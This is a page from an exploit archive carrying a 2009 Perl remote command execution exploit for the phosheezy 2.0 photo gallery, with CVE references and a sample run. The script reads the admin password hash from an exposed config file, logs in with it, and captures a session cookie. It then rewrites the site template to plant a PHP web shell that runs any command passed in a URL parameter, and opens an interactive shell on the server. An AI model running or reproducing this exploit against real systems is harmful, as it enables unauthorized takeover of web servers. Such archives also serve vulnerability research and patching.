phosheezy 2.0 Remote Command Execution Exploit

2009.01.23
Credit: Osirys
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-0250 | CVE-2009-0251
CWE: CWE-264
CWE-94

#!/usr/bin/perl # phosheezy 2.0 # http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz # Remote Command Execution Exploit # by Osirys # osirys[at]live[dot]it # osirys.org # Greets: HaVoC, x0r, jay, BlackLight # lol at athos # -------------------------------------------------------------- # Exploit in action :D # -------------------------------------------------------------- # osirys[~]>$ perl exp.txt http://localhost/phosheezy/ # # ---------------------------- # Phosheezy RCE Exploit # Coded by Osirys # ---------------------------- # # [+] Admin password found: # Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c # [+] Grabbing server headers to get a valid SESSION ID .. # [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2 # [+] Succesfully logged in as Administrator # [+] Template edited, RCE Vulnerability Created ! # shell$> id # uid=80(apache) gid=80(apache) groups=80(apache) # shell$> exit # [-] Quitting .. # osirys[~]>$ # -------------------------------------------------------------- use HTTP::Request; use LWP::UserAgent; use IO::Socket; my $host = $ARGV[0]; my $pwd_path = "/config/password"; my $adm_path = "/admin.php"; my $templ_path = "/admin.php?action=3"; help("-1") unless ($host); cheek($host) == 1 || help("-2"); &banner; $datas = get_data($host); $datas =~ /(.*) (.*)/; ($h0st,$path) = ($1,$2); my $url = $host.$pwd_path; my $re = get_req($url); if ($re =~ /([0-9a-f]{40})/) { $password = $1; print "[+] Admin password found:\n"; print " Sha1 pwd: $password \n"; adm_log($password); } else { print "[-] Unable to get sha1 Admin password\n\n"; exit(0); } sub adm_log() { my $password = $_[0]; my $link = $path.".".$adm_path; my $post = "password=$password&Login=Login"; my $length = length($post); my @data; my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!; my $data = "POST ".$link." HTTP/1.1\r\n". "Host: ".$h0st."\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".$length."\r\n\r\n". $post."\r\n"; $socket->send($data); print "[+] Grabbing server headers to get a valid SESSION ID ..\n"; while (my $e = <$socket>) { push(@data,$e); } foreach my $e(@data) { if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) { $log_ = 1; print "[+] Succesfully logged in as Administrator\n"; } elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) { $phpsessid = $1; print "[+] SESSION ID grabbed: $phpsessid\n"; } } (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n"; RCE_create($phpsessid); } sub RCE_create() { my $phpsessid = $_[0]; my $link = $path.".".$templ_path; my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit". "le></head><body bgcolor=\"#ffffff\" text=\"#0000". "00\">&footer=</body></html><!-- cmd --><?php sys". "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout"; my $length = length($code); my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!; my $data = "POST ".$link." HTTP/1.1\r\n". "Host: ".$h0st."\r\n". "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".$length."\r\n\r\n". "$code\r\n"; $socket->send($data); while (my $e = <$socket>) { if ($e =~ /Edit layout again/) { $rce_c = 1; print "[+] Template edited, RCE Vulnerability Created !\n"; } } $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n"; &exec_cmd; } sub exec_cmd { print "shell\$> "; $cmd = <STDIN>; $cmd !~ /exit/ || die "[-] Quitting ..\n"; $exec_url = ($host."/index.php?cmd=".$cmd); $re = get_req($exec_url); if ($re =~ /<!-- cmd -->(.*)/) { my $cmd = $1; $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/; print "$cmd\n"; &exec_cmd; } else { print "[-] Undefined output or bad cmd !\n"; &exec_cmd; } } sub get_req() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; } sub cheek() { my $host = $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } } sub get_data() { my $host = $_[0]; $host =~ /http:\/\/(.*)/; $s_host = $1; $s_host =~ /([a-z.]{1,30})\/(.*)/; ($h0st,$path) = ($1,$2); $h0st !~ /www/ || $h0st =~ s/www\.//; $path =~ s/(.*)/\/$1/; $full_det = $h0st." ".$path; return $full_det; } sub banner { print "\n". " ---------------------------- \n". " Phosheezy RCE Exploit \n". " Coded by Osirys \n". " ---------------------------- \n\n"; } sub help() { my $error = $_[0]; if ($error == -1) { &banner; print "\n[-] Cheek that you provide a hostname address!\n"; } elsif ($error == -2) { &banner; print "\n[-] Bad hostname address !\n"; } print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; exit(0); }

References:

http://xforce.iss.net/xforce/xfdb/48056
http://www.milw0rm.com/exploits/7780
http://secunia.com/advisories/33531
http://osvdb.org/51411


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top